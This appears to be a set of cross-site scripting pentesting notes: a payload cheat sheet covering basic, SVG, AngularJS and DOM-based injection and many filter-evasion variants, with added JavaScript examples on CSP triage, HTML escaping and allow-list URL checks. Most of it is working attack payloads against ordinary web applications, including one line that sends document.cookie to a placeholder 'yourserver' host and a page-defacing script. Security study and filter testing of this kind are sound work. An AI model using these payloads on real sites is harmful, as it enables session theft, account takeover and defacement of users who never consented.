What is XSS

Cross-Site Scripting (XSS) is a type of security vulnerability that occurs when an attacker is able to inject malicious scripts into a website, which are then executed in the browser of users who visit that site. This type of attack exploits the trust a user has in a website and can lead to unauthorized actions being taken on behalf of the victim or the exposure of sensitive data.


Exploitation

Content Security Policy (CSP)

Check the response headers before spending time on payloads. A policy like the one below allows scripts only from the page's own origin: with no 'unsafe-inline' in script-src, every inline <script>, on* event handler and javascript: URL on this page is blocked, and without 'unsafe-eval' the eval() variants are blocked too. If script-src is missing, default-src applies; if the header is missing altogether, nothing is restricted.

Content-Security-Policy: default-src 'none'; script-src 'self'; style-src 'self'; img-src 'self';
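Added example, not code from the original notes: a small parser for a Content-Security-Policy header that reports which payload classes on this page a given policy still allows. It applies the browser rules for the script-src / default-src fallback, 'unsafe-inline', nonces and hashes, and 'unsafe-eval'; 'strict-dynamic' and wildcard matching are not modelled (assumption: simple policies), and the sample policies in the usage are made up.

```javascript
// Added example, not code from the original notes. Parses a
// Content-Security-Policy header value and reports what the page's payloads
// need: inline script / event handlers / javascript: URLs ('unsafe-inline'),
// eval()-style execution ('unsafe-eval'), or no script restriction at all.
// 'strict-dynamic' and wildcard host matching are deliberately not modelled.

// Split "a b; c d" into { a: [b], c: [d] }. Browsers honour the first
// occurrence of a directive and ignore later repeats.
function parseCsp(header) {
  const directives = {};
  for (const part of String(header || '').split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!(name in directives)) directives[name] = tokens.slice(1);
  }
  return directives;
}

// script-src governs scripts; default-src is the fallback when it is absent;
// with neither present, scripts are unrestricted (returned as null).
function scriptSources(directives) {
  if ('script-src' in directives) return directives['script-src'];
  if ('default-src' in directives) return directives['default-src'];
  return null;
}

function assessCsp(header) {
  const sources = scriptSources(parseCsp(header));
  if (sources === null) {
    return { restricted: false, inlineAllowed: true, evalAllowed: true, hosts: [] };
  }
  const lower = sources.map((s) => s.toLowerCase());
  // A nonce or hash source makes 'unsafe-inline' a no-op (CSP Level 2 and
  // later), so "unsafe-inline plus nonce" still blocks injected inline script.
  const hasNonceOrHash = lower.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
  const inlineAllowed = lower.includes("'unsafe-inline'") && !hasNonceOrHash;
  const evalAllowed = lower.includes("'unsafe-eval'");
  // Where an external script could still be loaded from: host/scheme sources
  // plus 'self' (the page's own origin).
  const hosts = sources.filter((s) => !s.startsWith("'") || s.toLowerCase() === "'self'");
  return { restricted: true, inlineAllowed, evalAllowed, hosts };
}

// One-line triage verdict for a response header.
function cspVerdict(header) {
  const a = assessCsp(header);
  if (!a.restricted) return 'no script restriction: any payload on this page works';
  if (a.inlineAllowed) return 'inline script allowed: <script>, on*= and javascript: payloads work';
  return 'inline script blocked: scripts may only load from ' +
    (a.hosts.length ? a.hosts.join(', ') : 'nowhere');
}

// Usage with the policy from the notes above:
cspVerdict("default-src 'none'; script-src 'self'; style-src 'self'; img-src 'self';");
```

With the policy shown above the verdict is "inline script blocked: scripts may only load from 'self'", which is why a reflected <img onerror=...> does nothing there and the realistic next step is finding a same-origin file whose contents you control.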

Type

# Normal

<script>alert('xss')</script>
<img src=x onerror=alert('1')>
<><img src=x onerror=alert(1)>
javascript:alert(%27xss%27)
<body onresize=alert(1)>                                   ---> Other HTML tags / event handlers
<xss id=x onfocus=alert(document.cookie) tabindex=1>#x     ---> No known HTML tag needed: the browser still creates an element for <xss>
  |_____ tabindex=1 -> Makes the element focusable (not every element is by default); the #x fragment in the URL focuses id=x and fires onfocus

---------------------------------------------------------------------------------
# IMG

<img src=x>                                                ---> No handler: only checks whether the tag survives the filter
<img src=1 onerror=alert(1)>                               ---> src that cannot load, so onerror fires as soon as the image is parsed
<img src=x onerror=this.src='http://yourserver/?c='+document.cookie>   ---> Cookie exfiltration (HttpOnly cookies are not in document.cookie)

<svg><animatetransform onbegin=alert(1) attributeName=transform>       ---> Fires when the animation starts, no user interaction
<svg> ---> https://github.com/allanlw/svg-cheatsheet (very powerful: many more SVG elements and events)

---------------------------------------------------------------------------------
# HREF

<a href="javascript:alert(1)">click</a>     ---> Input landing in an href (or src/action/formaction) attribute: the javascript: scheme runs on click

---------------------------------------------------------------------------------
# Hash Change

<iframe src="https://domain.com/#" onload="this.src+='<img src=x onerror=alert(1)>'"></iframe>
  |_____ Appending to src only changes the fragment, so the frame is not reloaded but its hashchange event fires; works when the framed page passes location.hash into an HTML sink (DOM XSS)

---------------------------------------------------------------------------------
# Canonical

<link rel="canonical" href="https://web.com/?" accesskey="x" onclick="alert(1)">
  |_____ For input reflected inside a <link> attribute: accesskey="x" makes the key combination trigger onclick (Chrome: ALT+X on Linux, ALT+SHIFT+X on Windows, CTRL+ALT+X on macOS); the victim has to press it
  
---------------------------------------------------------------------------------
# Other JS frameworks (client-side template injection)

## AngularJS

<body ng-app="" class="ng-scope">               ---> Look for ng-app: inside it AngularJS evaluates {{ }} expressions in the DOM, so no HTML tags are needed
{{$on.constructor("alert(1)")()}}               ---> $on is a scope method, so $on.constructor is Function; build a function from the string and call it

---------------------------------------------------------------------------------
# DOM
location.search      ---> Source: the query string of the URL (?param=value), attacker-controlled
document.write       ---> Sink: writes its argument into the document as HTML, so markup coming from the source is parsed and runs
                          Other common sinks: innerHTML, eval, location.href, jQuery's html() and $()
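Added example, not code from the original notes: the source-to-sink flow above as a vulnerable render function next to its encoded version. Node.js has no DOM, so each function returns the HTML string the page would hand to document.write(); in a browser the vulnerable one executes the payload. The page layout (a ?search= parameter reflected in a "You searched for" line) is assumed.

```javascript
// Added example, not from the original notes. Each render function returns the
// HTML that would be passed to document.write(); in a browser the vulnerable
// version runs the injected <img onerror=...>.
// Assumed page structure: "?search=term" reflected into a <p> element.

// Source: the query string, as in location.search ("?search=term").
function getSearchTerm(search) {
  return new URLSearchParams(search).get('search') || '';
}

// Vulnerable sink: attacker-controlled text concatenated into markup.
function renderVulnerable(search) {
  return '<p>You searched for: ' + getSearchTerm(search) + '</p>';
}

// HTML-encode the characters that change meaning in element text and in
// attribute values. Right for this sink; data going into a JavaScript string
// or a URL needs the encoder for that context instead.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Fixed sink: the payload survives only as inert text.
function renderSafe(search) {
  return '<p>You searched for: ' + escapeHtml(getSearchTerm(search)) + '</p>';
}

// In a real page the cleaner fix is to avoid the HTML sink altogether: create
// the <p> and assign element.textContent = term, which is never parsed as HTML.

// Usage: the classic reflected payload from the notes, URL-encoded as a
// browser would send it.
renderVulnerable('?search=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E');
renderSafe('?search=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E');
```

The vulnerable call returns the markup with a live <img src=x onerror=alert(1)> inside it; the safe call returns the same line with &lt;img ... &gt;, which the browser displays as text.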

Evasion

# Combination
'"`//> <script>alert(1)</script>    ---> Combination of the most popular breakouts: closes an open single quote, double quote or backtick, comments out the rest of a JavaScript line, closes an open tag, then starts a new script

---------------------------------------------------------------------------------
# Encoding (possible to encode multiple times when the target decodes more than once)
urlencode "http://example.com/?param=linux+url+encoder"    ---> Command-line helper that percent-encodes its argument

<img onerror=&#34alert(1)&#34src=x>
<img onerror=&#39alert(1)&#39src=x>

<script>Encoding</script>  ---> %3Cscript%3EEncoding%3C%2Fscript%3E

---------------------------------------------------------------------------------
# Basic Modification

## Tabs/newlines/CR between the tag name and >
<script&#9>alert(1)</script>
<script&#10>alert(1)</script>
<script&#13>alert(1)</script>
  |_____ Caveat: the HTML parser only decodes character references inside attribute values and text, not in tag names, so these forms only beat filters that decode before matching. Against the browser itself use the raw bytes (0x09, 0x0A, 0x0D), which are valid whitespace after a tag name.

## Capital letters
<ScRipT>alert(1)</sCriPt>

## If angle brackets are encoded (input lands inside a JavaScript string)
'-alert(1)-'  ---> Close the string with the quote, use (-) as an operator so the expression stays valid, then reopen the string; no < or > needed

---------------------------------------------------------------------------------
# Adding Nullbytes

<%00script>alert(1)</script>
<scr%00ipt>alert(1)</script>
  |_____ Old Internet Explorer ignored NUL bytes in tag names; current browsers do not, so this mainly catches filters that stop matching at the first NUL

---------------------------------------------------------------------------------
# Attributes and Tags

<input type="text" name="input" value="hello" >                              ---> Original markup: the input lands in the value attribute
<input type="text" name="input" value="><script>alert(1)</script>           ---> Close the attribute and the tag with ">, then add the payload
<randomtag type="text" name="input" value="><script>alert(1)</script>       ---> Unknown tag names are still parsed as elements
<input/type="text" name="input" value="><script>alert(1)</script>           ---> / is accepted as a separator after the tag name
<input&#9type="text" name="input" value="><script>alert(1)</script>         ---> Encoded tab/LF/CR: filter tests only, the parser does not decode references here (raw 0x09/0x0A/0x0D do work)
<input&#10type="text" name="input" value="><script>alert(1)</script>
<input&#13type="text" name="input" value="><script>alert(1)</script>
<input/'type="text" name="input" value="><script>alert(1)</script>          ---> Junk between the separator and the attribute name is tolerated
<iNpUt type="text" name="input" value="><script>alert(1)</script>           ---> Mixed-case tag name

---------------------------------------------------------------------------------
# Attributes Nullbytes

<%00input type="text" name="input" value="><script>alert(1)</script>
<inp%00ut type="text" name="input" value="><script>alert(1)</script>
<input t%00ype="text" name="input" value="><script>alert(1)</script>
<input type="text" name="input" value="><script>a%00lert(1)</script>
  |_____ Same Internet Explorer era NUL trick as above; a NUL inside the JavaScript (a%00lert) is a syntax error for the browser, so these only matter where the filter, not the browser, drops the byte

---------------------------------------------------------------------------------
# Event Handler

<input onfocus=alert(1) autofocus>     ---> autofocus fires onfocus without user interaction
<input onsubmit=alert(1)>              ---> Does not fire: the submit event is dispatched to the <form>, not to the input (put onsubmit on a form tag)

---------------------------------------------------------------------------------
# Delimiters, Backticks and Breakers

## Quote delimiters (double or single quotes; no space is needed before the next attribute)
<img onerror="alert(1)"src=x>
<img onerror='alert(1)'src=x>

## Backticks
<img onerror=`alert(1)`src=x>
  |_____ Backticks as attribute delimiters were an Internet Explorer quirk; in current browsers the value is unquoted and the backticks become part of the JavaScript

## Encoded backticks
<img onerror=&#96alert(1)&#96src=x>

## Double use of delimiters
<<script>alert(1)//<</script>      ---> The browser emits the extra < as text; the // comments out the trailing < inside the script

## Unknown delimiters
«input onsubmit=alert(1)»          ---> Not a tag for the browser; checks whether the filter only matches ASCII angle brackets

---------------------------------------------------------------------------------
# eval()

<script>eval('a\u006cert(1)')</script>
<script>eval('al' + 'ert(1)')</script>
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))</script>    

---------------------------------------------------------------------------------
# Word Filter (if a JavaScript keyword or tag name is removed from the input)

<scrscriptipt>alert(1)</scrscriptipt>  ---> A filter that deletes "script" once turns this into <script>alert(1)</script>
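Added example, not code from the original notes, covering both the Encoding section and the word filter above: two deny-list checks of the kind those payloads get past, beside the normalisation an allow-list check has to do first. Sample inputs are constructed; the decoder handles numeric character references only (assumption: that is what the payloads on this page use).

```javascript
// Added example, not from the original notes. Two deny-list filters that the
// "Encoding" and "Word Filter" payloads defeat, beside the checks that hold.

// --- Word filter: deleting "script" once rebuilds the tag from its halves.
function stripScriptOnce(input) {
  return input.replace(/script/gi, '');
}

// Repeating until nothing changes closes that hole, but it is still a
// deny-list: <img onerror=...>, <svg onload=...> and friends pass untouched.
function stripScriptRepeatedly(input) {
  let previous;
  do {
    previous = input;
    input = input.replace(/script/gi, '');
  } while (input !== previous);
  return input;
}

// --- Scheme filter on a URL attribute. The HTML parser decodes character
// references in attribute values before the URL parser sees the value, and
// the URL parser drops tab/LF/CR anywhere and leading C0 controls/spaces, so
// "jav&#x09;ascript:" is "javascript:" to the browser. A check on the raw
// input never sees that.
function naiveSchemeCheck(url) {
  return !url.toLowerCase().startsWith('javascript:');
}

// Decode decimal and hex numeric character references in one pass; the
// trailing ';' is optional because browsers accept both forms. Named
// references (&lt; etc.) are not handled (assumption: not needed here).
function decodeNumericRefs(s) {
  const toChar = (n) => (n > 0x10ffff ? '\ufffd' : String.fromCodePoint(n));
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (_, ref) =>
    toChar(ref[0].toLowerCase() === 'x' ? parseInt(ref.slice(1), 16) : parseInt(ref, 10)));
}

// Allow-list check: normalise the way the browser will (decode, drop C0
// controls and space, lower-case), extract the scheme, accept only known ones.
// Over-stripping is fine here: it can only cause extra rejections.
function isSafeUrl(url) {
  const normalised = decodeNumericRefs(url).replace(/[\x00-\x20]/g, '').toLowerCase();
  const match = normalised.match(/^([a-z][a-z0-9+.-]*):/);
  if (!match) return true; // no scheme: relative URL, stays on the current origin
  return ['http', 'https', 'mailto'].includes(match[1]);
}

// Usage: the constructed payloads from the sections above.
stripScriptOnce('<scrscriptipt>alert(1)</scrscriptipt>'); // the tag is back
naiveSchemeCheck('jav&#x09;ascript:alert(1)');           // passes the naive check
isSafeUrl('jav&#x09;ascript:alert(1)');                  // rejected after normalisation
```

The point of the pair is that the second filter is not a better deny-list but a different shape of check: it canonicalises to what the browser will act on, then compares against the short list of schemes the application actually needs.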

---------------------------------------------------------------------------------
# HTML Defacing

<script>document.querySelector('#thm-title').textContent = 'Im a hacker'</script>

HTML DOM Events


General Tools

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet (very good)
https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html